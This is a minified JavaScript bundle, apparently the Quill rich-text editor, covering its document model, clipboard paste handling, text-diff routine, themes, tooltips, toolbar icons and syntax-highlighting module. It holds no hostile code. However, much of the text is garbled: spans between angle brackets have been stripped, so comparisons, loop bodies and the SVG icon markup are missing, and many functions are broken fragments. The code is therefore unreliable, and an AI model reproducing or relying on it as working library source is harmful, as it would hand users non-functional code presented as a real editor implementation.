a},e}();a.default=i},function(e,a,n){"use strict";var i=this&&this.__extends||function(){var e=Object.setPrototypeOf||{__proto__:[]}instanceof Array&&function(e,a){e.__proto__=a}||function(e,a){for(var n in a)a.hasOwnProperty(n)&&(e[n]=a[n])};return function(a,n){function i(){this.constructor=a}e(a,n),a.prototype=null===n?Object.create(n):(i.prototype=n.prototype,new i)}}();Object.defineProperty(a,"__esModule",{value:!0});var t=n(17),r=n(1),o={attributes:!0,characterData:!0,characterDataOldValue:!0,childList:!0,subtree:!0},s=function(e){function a(a){var n=e.call(this,a)||this;return n.scroll=n,n.observer=new MutationObserver((function(e){n.update(e)})),n.observer.observe(n.domNode,o),n.attach(),n}return 
i(a,e),a.prototype.detach=function(){e.prototype.detach.call(this),this.observer.disconnect()},a.prototype.deleteAt=function(a,n){this.update(),0===a&&n===this.length()?this.children.forEach((function(e){e.remove()})):e.prototype.deleteAt.call(this,a,n)},a.prototype.formatAt=function(a,n,i,t){this.update(),e.prototype.formatAt.call(this,a,n,i,t)},a.prototype.insertAt=function(a,n,i){this.update(),e.prototype.insertAt.call(this,a,n,i)},a.prototype.optimize=function(a,n){var i=this;void 0===a&&(a=[]),void 0===n&&(n={}),e.prototype.optimize.call(this,n);for(var o=[].slice.call(this.observer.takeRecords());o.length>0;)a.push(o.pop());for(var s=function e(a,n){void 0===n&&(n=!0),null!=a&&a!==i&&null!=a.domNode.parentNode&&(null==a.domNode[r.DATA_KEY].mutations&&(a.domNode[r.DATA_KEY].mutations=[]),n&&e(a.parent))},l=function e(a){null!=a.domNode[r.DATA_KEY]&&null!=a.domNode[r.DATA_KEY].mutations&&(a instanceof t.default&&a.children.forEach(e),a.optimize(n))},u=a,c=0;u.length>0;c+=1){if(c>=100)throw new Error("[Parchment] Maximum optimize iterations reached");for(u.forEach((function(e){var a=r.find(e.target,!0);null!=a&&(a.domNode===e.target&&("childList"===e.type?(s(r.find(e.previousSibling,!1)),[].forEach.call(e.addedNodes,(function(e){var a=r.find(e,!1);s(a,!1),a instanceof t.default&&a.children.forEach((function(e){s(e,!1)}))}))):"attributes"===e.type&&s(a.prev)),s(a))})),this.children.forEach(l),o=(u=[].slice.call(this.observer.takeRecords())).slice();o.length>0;)a.push(o.pop())}},a.prototype.update=function(a,n){var i=this;void 0===n&&(n={}),(a=a||this.observer.takeRecords()).map((function(e){var a=r.find(e.target,!0);return null==a?null:null==a.domNode[r.DATA_KEY].mutations?(a.domNode[r.DATA_KEY].mutations=[e],a):(a.domNode[r.DATA_KEY].mutations.push(e),null)})).forEach((function(e){null!=e&&e!==i&&null!=e.domNode[r.DATA_KEY]&&e.update(e.domNode[r.DATA_KEY].mutations||[],n)})),null!=this.domNode[r.DATA_KEY].mutations&&e.prototype.update.call(this,this.domNode[r.DATA_KEY].mutations,n),this.optimize(a,n)},a.blotName="scroll",a.defaultChild="block",a.scope=r.Scope.BLOCK_BLOT,a.tagName="DIV",a}(t.default);a.default=s},function(e,a,n){"use strict";var i=this&&this.__extends||function(){var e=Object.setPrototypeOf||{__proto__:[]}instanceof Array&&function(e,a){e.__proto__=a}||function(e,a){for(var n in a)a.hasOwnProperty(n)&&(e[n]=a[n])};return function(a,n){function i(){this.constructor=a}e(a,n),a.prototype=null===n?Object.create(n):(i.prototype=n.prototype,new i)}}();Object.defineProperty(a,"__esModule",{value:!0});var t=n(18),r=n(1),o=function(e){function a(){return null!==e&&e.apply(this,arguments)||this}return i(a,e),a.formats=function(n){if(n.tagName!==a.tagName)return e.formats.call(this,n)},a.prototype.format=function(n,i){var r=this;n!==this.statics.blotName||i?e.prototype.format.call(this,n,i):(this.children.forEach((function(e){e instanceof t.default||(e=e.wrap(a.blotName,!0)),r.attributes.copy(e)})),this.unwrap())},a.prototype.formatAt=function(a,n,i,t){null!=this.formats()[i]||r.query(i,r.Scope.ATTRIBUTE)?this.isolate(a,n).format(i,t):e.prototype.formatAt.call(this,a,n,i,t)},a.prototype.optimize=function(n){e.prototype.optimize.call(this,n);var i=this.formats();if(0===Object.keys(i).length)return this.unwrap();var t=this.next;t instanceof a&&t.prev===this&&function(e,a){if(Object.keys(e).length!==Object.keys(a).length)return!1;for(var n in 
e)if(e[n]!==a[n])return!1;return!0}(i,t.formats())&&(t.moveChildren(this),t.remove())},a.blotName="inline",a.scope=r.Scope.INLINE_BLOT,a.tagName="SPAN",a}(t.default);a.default=o},function(e,a,n){"use strict";var i=this&&this.__extends||function(){var e=Object.setPrototypeOf||{__proto__:[]}instanceof Array&&function(e,a){e.__proto__=a}||function(e,a){for(var n in a)a.hasOwnProperty(n)&&(e[n]=a[n])};return function(a,n){function i(){this.constructor=a}e(a,n),a.prototype=null===n?Object.create(n):(i.prototype=n.prototype,new i)}}();Object.defineProperty(a,"__esModule",{value:!0});var t=n(18),r=n(1),o=function(e){function a(){return null!==e&&e.apply(this,arguments)||this}return i(a,e),a.formats=function(n){var i=r.query(a.blotName).tagName;if(n.tagName!==i)return e.formats.call(this,n)},a.prototype.format=function(n,i){null!=r.query(n,r.Scope.BLOCK)&&(n!==this.statics.blotName||i?e.prototype.format.call(this,n,i):this.replaceWith(a.blotName))},a.prototype.formatAt=function(a,n,i,t){null!=r.query(i,r.Scope.BLOCK)?this.format(i,t):e.prototype.formatAt.call(this,a,n,i,t)},a.prototype.insertAt=function(a,n,i){if(null==i||null!=r.query(n,r.Scope.INLINE))e.prototype.insertAt.call(this,a,n,i);else{var t=this.split(a),o=r.create(n,i);t.parent.insertBefore(o,t)}},a.prototype.update=function(a,n){navigator.userAgent.match(/Trident/)?this.build():e.prototype.update.call(this,a,n)},a.blotName="block",a.scope=r.Scope.BLOCK_BLOT,a.tagName="P",a}(t.default);a.default=o},function(e,a,n){"use strict";var i=this&&this.__extends||function(){var e=Object.setPrototypeOf||{__proto__:[]}instanceof Array&&function(e,a){e.__proto__=a}||function(e,a){for(var n in a)a.hasOwnProperty(n)&&(e[n]=a[n])};return function(a,n){function i(){this.constructor=a}e(a,n),a.prototype=null===n?Object.create(n):(i.prototype=n.prototype,new i)}}();Object.defineProperty(a,"__esModule",{value:!0});var t=function(e){function a(){return null!==e&&e.apply(this,arguments)||this}return i(a,e),a.formats=function(e){},a.prototype.format=function(a,n){e.prototype.formatAt.call(this,0,this.length(),a,n)},a.prototype.formatAt=function(a,n,i,t){0===a&&n===this.length()?this.format(i,t):e.prototype.formatAt.call(this,a,n,i,t)},a.prototype.formats=function(){return this.statics.formats(this.domNode)},a}(n(19).default);a.default=t},function(e,a,n){"use strict";var i=this&&this.__extends||function(){var e=Object.setPrototypeOf||{__proto__:[]}instanceof Array&&function(e,a){e.__proto__=a}||function(e,a){for(var n in a)a.hasOwnProperty(n)&&(e[n]=a[n])};return function(a,n){function i(){this.constructor=a}e(a,n),a.prototype=null===n?Object.create(n):(i.prototype=n.prototype,new i)}}();Object.defineProperty(a,"__esModule",{value:!0});var t=n(19),r=n(1),o=function(e){function a(a){var n=e.call(this,a)||this;return n.text=n.statics.value(n.domNode),n}return i(a,e),a.create=function(e){return document.createTextNode(e)},a.value=function(e){var a=e.data;return a.normalize&&(a=a.normalize()),a},a.prototype.deleteAt=function(e,a){this.domNode.data=this.text=this.text.slice(0,e)+this.text.slice(e+a)},a.prototype.index=function(e,a){return this.domNode===e?a:-1},a.prototype.insertAt=function(a,n,i){null==i?(this.text=this.text.slice(0,a)+n+this.text.slice(a),this.domNode.data=this.text):e.prototype.insertAt.call(this,a,n,i)},a.prototype.length=function(){return this.text.length},a.prototype.optimize=function(n){e.prototype.optimize.call(this,n),this.text=this.statics.value(this.domNode),0===this.text.length?this.remove():this.next instanceof 
a&&this.next.prev===this&&(this.insertAt(this.length(),this.next.value()),this.next.remove())},a.prototype.position=function(e,a){return void 0===a&&(a=!1),[this.domNode,e]},a.prototype.split=function(e,a){if(void 0===a&&(a=!1),!a){if(0===e)return this;if(e===this.length())return this.next}var n=r.create(this.domNode.splitText(e));return this.parent.insertBefore(n,this.next),this.text=this.statics.value(this.domNode),n},a.prototype.update=function(e,a){var n=this;e.some((function(e){return"characterData"===e.type&&e.target===n.domNode}))&&(this.text=this.statics.value(this.domNode))},a.prototype.value=function(){return this.text},a.blotName="text",a.scope=r.Scope.INLINE_BLOT,a}(t.default);a.default=o},function(e,a,n){"use strict";var i=document.createElement("div");if(i.classList.toggle("test-class",!1),i.classList.contains("test-class")){var t=DOMTokenList.prototype.toggle;DOMTokenList.prototype.toggle=function(e,a){return arguments.length>1&&!this.contains(e)===!a?a:t.call(this,e)}}String.prototype.startsWith||(String.prototype.startsWith=function(e,a){return a=a||0,this.substr(a,e.length)===e}),String.prototype.endsWith||(String.prototype.endsWith=function(e,a){var n=this.toString();("number"!==typeof a||!isFinite(a)||Math.floor(a)!==a||a>n.length)&&(a=n.length),a-=e.length;var i=n.indexOf(e,a);return-1!==i&&i===a}),Array.prototype.find||Object.defineProperty(Array.prototype,"find",{value:function(e){if(null===this)throw new TypeError("Array.prototype.find called on null or undefined");if("function"!==typeof e)throw new TypeError("predicate must be a function");for(var a,n=Object(this),i=n.length>>>0,t=arguments[1],r=0;ra.length?e:a,u=e.length>a.length?a:e,c=l.indexOf(u);if(-1!=c)return s=[[1,l.substring(0,c)],[0,u],[1,l.substring(c+u.length)]],e.length>a.length&&(s[0][0]=s[2][0]=n),s;if(1==u.length)return[[n,e],[1,a]];var d=function(e,a){var n=e.length>a.length?e:a,i=e.length>a.length?a:e;if(n.length<4||2*i.length=e.length?[i,t,s,l,d]:null}var s,l,u,c,d,h=t(n,i,Math.ceil(n.length/4)),p=t(n,i,Math.ceil(n.length/2));if(!h&&!p)return null;s=p?h&&h[4].length>p[4].length?h:p:h,e.length>a.length?(l=s[0],u=s[1],c=s[2],d=s[3]):(c=s[0],d=s[1],l=s[2],u=s[3]);var m=s[4];return[l,u,c,d,m]}(e,a);if(d){var h=d[0],p=d[1],m=d[2],f=d[3],v=d[4],g=i(h,m),b=i(p,f);return g.concat([[0,v]],b)}return function(e,a){for(var i=e.length,r=a.length,o=Math.ceil((i+r)/2),s=o,l=2*o,u=new Array(l),c=new Array(l),d=0;di)f+=2;else if(x>r)m+=2;else if(p&&(w=s+h-k)>=0&&w=(A=i-c[w]))return t(e,a,j,x)}for(var S=-b+v;S<=b-g;S+=2){for(var A,w=s+S,M=(A=S==-b||S!=b&&c[w-1]i)g+=2;else if(M>r)v+=2;else if(!p){var j;if((y=s+h-S)>=0&&y=(A=i-A))return t(e,a,j,x)}}}return[[n,e],[1,a]]}(e,a)}(e=e.substring(0,e.length-c),a=a.substring(0,a.length-c));return d&&p.unshift([0,d]),h&&p.push([0,h]),s(p),null!=l&&(p=function(e,a){var i=function(e,a){if(0===a)return[0,e];for(var i=0,t=0;t0&&t.splice(r+2,0,[s[0],l]),u(t,r,3)}return e}(p,l)),p=function(e){for(var a=!1,i=function(e){return e.charCodeAt(0)>=56320&&e.charCodeAt(0)<=57343},t=function(e){return e.charCodeAt(e.length-1)>=55296&&e.charCodeAt(e.length-1)<=56319},r=2;r0&&o.push(e[r]);return o}(p)}function t(e,a,n,t){var r=e.substring(0,n),o=a.substring(0,t),s=e.substring(n),l=a.substring(t),u=i(r,o),c=i(s,l);return u.concat(c)}function r(e,a){if(!e||!a||e.charAt(0)!=a.charAt(0))return 0;for(var 
n=0,i=Math.min(e.length,a.length),t=i,r=0;n1?(0!==t&&0!==l&&(0!==(a=r(c,u))&&(i-t-l>0&&0==e[i-t-l-1][0]?e[i-t-l-1][1]+=c.substring(0,a):(e.splice(0,0,[0,c.substring(0,a)]),i++),c=c.substring(a),u=u.substring(a)),0!==(a=o(c,u))&&(e[i][1]=c.substring(c.length-a)+e[i][1],c=c.substring(0,c.length-a),u=u.substring(0,u.length-a))),0===t?e.splice(i-l,t+l,[1,c]):0===l?e.splice(i-t,t+l,[n,u]):e.splice(i-t-l,t+l,[n,u],[1,c]),i=i-t-l+(t?1:0)+(l?1:0)+1):0!==i&&0==e[i-1][0]?(e[i-1][1]+=e[i][1],e.splice(i,1)):i++,l=0,t=0,u="",c=""}""===e[e.length-1][1]&&e.pop();var d=!1;for(i=1;i=0&&i>=a-1;i--)if(i+1=700)&&(n.bold=!0),Object.keys(n).length>0&&(a=C(a,n)),parseFloat(i.textIndent||0)>0&&(a=(new s.default).insert("\t").concat(a)),a}],["li",function(e,a){var n=l.default.query(e);if(null==n||"list-item"!==n.blotName||!B(a,"\n"))return a;for(var i=-1,t=e.parentNode;!t.classList.contains("ql-clipboard");)"list"===(l.default.query(t)||{}).blotName&&(i+=1),t=t.parentNode;return i<=0?a:a.compose((new s.default).retain(a.length()-1).retain(1,{indent:i}))}],["b",z.bind(z,"bold")],["i",z.bind(z,"italic")],["style",function(){return new s.default}]],w=[h.AlignAttribute,v.DirectionAttribute].reduce((function(e,a){return e[a.keyName]=a,e}),{}),M=[h.AlignStyle,p.BackgroundStyle,f.ColorStyle,v.DirectionStyle,g.FontStyle,b.SizeStyle].reduce((function(e,a){return e[a.keyName]=a,e}),{}),j=function(e){function a(e,n){!function(e,a){if(!(e instanceof a))throw new TypeError("Cannot call a class as a function")}(this,a);var i=function(e,a){if(!e)throw new ReferenceError("this hasn't been initialised - super() hasn't been called");return!a||"object"!==typeof a&&"function"!==typeof a?e:a}(this,(a.__proto__||Object.getPrototypeOf(a)).call(this,e,n));return i.quill.root.addEventListener("paste",i.onPaste.bind(i)),i.container=i.quill.addContainer("ql-clipboard"),i.container.setAttribute("contenteditable",!0),i.container.setAttribute("tabindex",-1),i.matchers=[],A.concat(i.options.matchers).forEach((function(e){var a=t(e,2),r=a[0],o=a[1];(n.matchVisual||o!==K)&&i.addMatcher(r,o)})),i}return function(e,a){if("function"!==typeof a&&null!==a)throw new TypeError("Super expression must either be null or a function, not "+typeof a);e.prototype=Object.create(a&&a.prototype,{constructor:{value:e,enumerable:!1,writable:!0,configurable:!0}}),a&&(Object.setPrototypeOf?Object.setPrototypeOf(e,a):e.__proto__=a)}(a,e),r(a,[{key:"addMatcher",value:function(e,a){this.matchers.push([e,a])}},{key:"convert",value:function(e){if("string"===typeof e)return this.container.innerHTML=e.replace(/\>\r?\n +\<"),this.convert();var a=this.quill.getFormat(this.quill.selection.savedRange.index);if(a[m.default.blotName]){var n=this.container.innerText;return this.container.innerHTML="",(new s.default).insert(n,y({},m.default.blotName,a[m.default.blotName]))}var i=this.prepareMatching(),r=t(i,2),o=r[0],l=r[1],u=L(this.container,o,l);return B(u,"\n")&&null==u.ops[u.ops.length-1].attributes&&(u=u.compose((new s.default).retain(u.length()-1).delete(1))),x.log("convert",this.container.innerHTML,u),this.container.innerHTML="",u}},{key:"dangerouslyPasteHTML",value:function(e,a){var n=arguments.length>2&&void 0!==arguments[2]?arguments[2]:u.default.sources.API;if("string"===typeof e)this.quill.setContents(this.convert(e),a),this.quill.setSelection(0,u.default.sources.SILENT);else{var i=this.convert(a);this.quill.updateContents((new s.default).retain(e).concat(i),n),this.quill.setSelection(e+i.length(),u.default.sources.SILENT)}}},{key:"onPaste",value:function(e){var 
a=this;if(!e.defaultPrevented&&this.quill.isEnabled()){var n=this.quill.getSelection(),i=(new s.default).retain(n.index),t=this.quill.scrollingContainer.scrollTop;this.container.focus(),this.quill.selection.update(u.default.sources.SILENT),setTimeout((function(){i=i.concat(a.convert()).delete(n.length),a.quill.updateContents(i,u.default.sources.USER),a.quill.setSelection(i.length()-n.length,u.default.sources.SILENT),a.quill.scrollingContainer.scrollTop=t,a.quill.focus()}),1)}}},{key:"prepareMatching",value:function(){var e=this,a=[],n=[];return this.matchers.forEach((function(i){var r=t(i,2),o=r[0],s=r[1];switch(o){case Node.TEXT_NODE:n.push(s);break;case Node.ELEMENT_NODE:a.push(s);break;default:[].forEach.call(e.container.querySelectorAll(o),(function(e){e[S]=e[S]||[],e[S].push(s)}))}})),[a,n]}}]),a}(d.default);function C(e,a,n){return"object"===("undefined"===typeof a?"undefined":i(a))?Object.keys(a).reduce((function(e,n){return C(e,n,a[n])}),e):e.reduce((function(e,i){return i.attributes&&i.attributes[a]?e.push(i):e.insert(i.insert,(0,o.default)({},y({},a,n),i.attributes))}),new s.default)}function P(e){if(e.nodeType!==Node.ELEMENT_NODE)return{};var a="__ql-computed-style";return e[a]||(e[a]=window.getComputedStyle(e))}function B(e,a){for(var n="",i=e.ops.length-1;i>=0&&n.length-1}function L(e,a,n){return e.nodeType===e.TEXT_NODE?n.reduce((function(a,n){return n(e,a)}),new s.default):e.nodeType===e.ELEMENT_NODE?[].reduce.call(e.childNodes||[],(function(i,t){var r=L(t,a,n);return t.nodeType===e.ELEMENT_NODE&&(r=a.reduce((function(e,a){return a(t,e)}),r),r=(t[S]||[]).reduce((function(e,a){return a(t,e)}),r)),i.concat(r)}),new s.default):new s.default}function z(e,a,n){return C(n,e,!0)}function N(e,a){var n=l.default.Attributor.Attribute.keys(e),i=l.default.Attributor.Class.keys(e),t=l.default.Attributor.Style.keys(e),r={};return n.concat(i).concat(t).forEach((function(a){var n=l.default.query(a,l.default.Scope.ATTRIBUTE);null!=n&&(r[n.attrName]=n.value(e),r[n.attrName])||(null==(n=w[a])||n.attrName!==a&&n.keyName!==a||(r[n.attrName]=n.value(e)||void 0),null==(n=M[a])||n.attrName!==a&&n.keyName!==a||(n=M[a],r[n.attrName]=n.value(e)||void 0))})),Object.keys(r).length>0&&(a=C(a,r)),a}function E(e,a){var n=l.default.query(e);if(null==n)return a;if(n.prototype instanceof l.default.Embed){var i={},t=n.value(e);null!=t&&(i[n.blotName]=t,a=(new s.default).insert(i,n.formats(e)))}else"function"===typeof n.formats&&(a=C(a,n.blotName,n.formats(e)));return a}function R(e,a){return B(a,"\n")||(T(e)||a.length()>0&&e.nextSibling&&T(e.nextSibling))&&a.insert("\n"),a}function K(e,a){if(T(e)&&null!=e.nextElementSibling&&!B(a,"\n\n")){var n=e.offsetHeight+parseFloat(P(e).marginTop)+parseFloat(P(e).marginBottom);e.nextElementSibling.offsetTop>e.offsetTop+1.5*n&&a.insert("\n")}return a}function D(e,a){var n=e.data;if("O:P"===e.parentNode.tagName)return a.insert(n.trim());if(0===n.trim().length&&e.parentNode.classList.contains("ql-clipboard"))return a;if(!P(e.parentNode).whiteSpace.startsWith("pre")){var i=function(e,a){return(a=a.replace(/[^\u00a0]/g,"")).length<1&&e?" 
":a};n=(n=n.replace(/\r\n/g," ").replace(/\n/g," ")).replace(/\s\s+/g,i.bind(i,!0)),(null==e.previousSibling&&T(e.parentNode)||null!=e.previousSibling&&T(e.previousSibling))&&(n=n.replace(/^\s+/,i.bind(i,!1))),(null==e.nextSibling&&T(e.parentNode)||null!=e.nextSibling&&T(e.nextSibling))&&(n=n.replace(/\s+$/,i.bind(i,!1)))}return a.insert(n)}j.DEFAULTS={matchers:[],matchVisual:!0},a.default=j,a.matchAttributor=N,a.matchBlot=E,a.matchNewline=R,a.matchSpacing=K,a.matchText=D},function(e,a,n){"use strict";Object.defineProperty(a,"__esModule",{value:!0});var i,t=function(){function e(e,a){for(var n=0;n '},function(e,a,n){"use strict";Object.defineProperty(a,"__esModule",{value:!0});var i,t=function(){function e(e,a){for(var n=0;ni.right&&(r=i.right-t.right,this.root.style.left=a+r+"px"),t.lefti.bottom){var o=t.bottom-t.top,s=e.bottom-e.top+o;this.root.style.top=n-s+"px",this.root.classList.add("ql-flip")}return r}},{key:"show",value:function(){this.root.classList.remove("ql-editing"),this.root.classList.remove("ql-hidden")}}]),e}();a.default=t},function(e,a,n){"use strict";Object.defineProperty(a,"__esModule",{value:!0});var i=function(e,a){if(Array.isArray(e))return e;if(Symbol.iterator in Object(e))return function(e,a){var n=[],i=!0,t=!1,r=void 0;try{for(var o,s=e[Symbol.iterator]();!(i=(o=s.next()).done)&&(n.push(o.value),!a||n.length!==a);i=!0);}catch(l){t=!0,r=l}finally{try{!i&&s.return&&s.return()}finally{if(t)throw r}}return n}(e,a);throw new TypeError("Invalid attempt to destructure non-iterable instance")},t=function e(a,n,i){null===a&&(a=Function.prototype);var t=Object.getOwnPropertyDescriptor(a,n);if(void 0===t){var r=Object.getPrototypeOf(a);return null===r?void 0:e(r,n,i)}if("value"in t)return t.value;var o=t.get;return void 0!==o?o.call(i):void 0},r=function(){function e(e,a){for(var n=0;n','','',''].join(""),a.default=b},function(e,a,n){"use strict";Object.defineProperty(a,"__esModule",{value:!0});var i=R(n(29)),t=n(36),r=n(38),o=n(64),s=R(n(65)),l=R(n(66)),u=n(67),c=R(u),d=n(37),h=n(26),p=n(39),m=n(40),f=R(n(56)),v=R(n(68)),g=R(n(27)),b=R(n(69)),k=R(n(70)),y=R(n(71)),x=R(n(72)),S=R(n(73)),A=n(13),w=R(A),M=R(n(74)),j=R(n(75)),C=R(n(57)),P=R(n(41)),B=R(n(28)),T=R(n(59)),L=R(n(60)),z=R(n(61)),N=R(n(108)),E=R(n(62));function R(e){return 
[minified JavaScript bundle (webpack chunk) containing the Quill 1.x editor runtime; angle brackets and inline SVG markup were stripped during extraction, so the code is not recoverable verbatim. The chunk registers Quill's attributors and formats (align, direction, indent, background, color, font, size, blockquote, code-block, header, list, bold, code, italic, link, script, strike, underline, image, video), the formula/syntax/toolbar modules, the bubble and snow themes, and the icon/picker/icon-picker/color-picker/tooltip UI widgets; defines the List, ListItem, Italic, Image, and Video blots; inlines the toolbar SVG icon assets; and implements the highlight.js-backed Syntax module and the BubbleTooltip class used by the bubble theme.]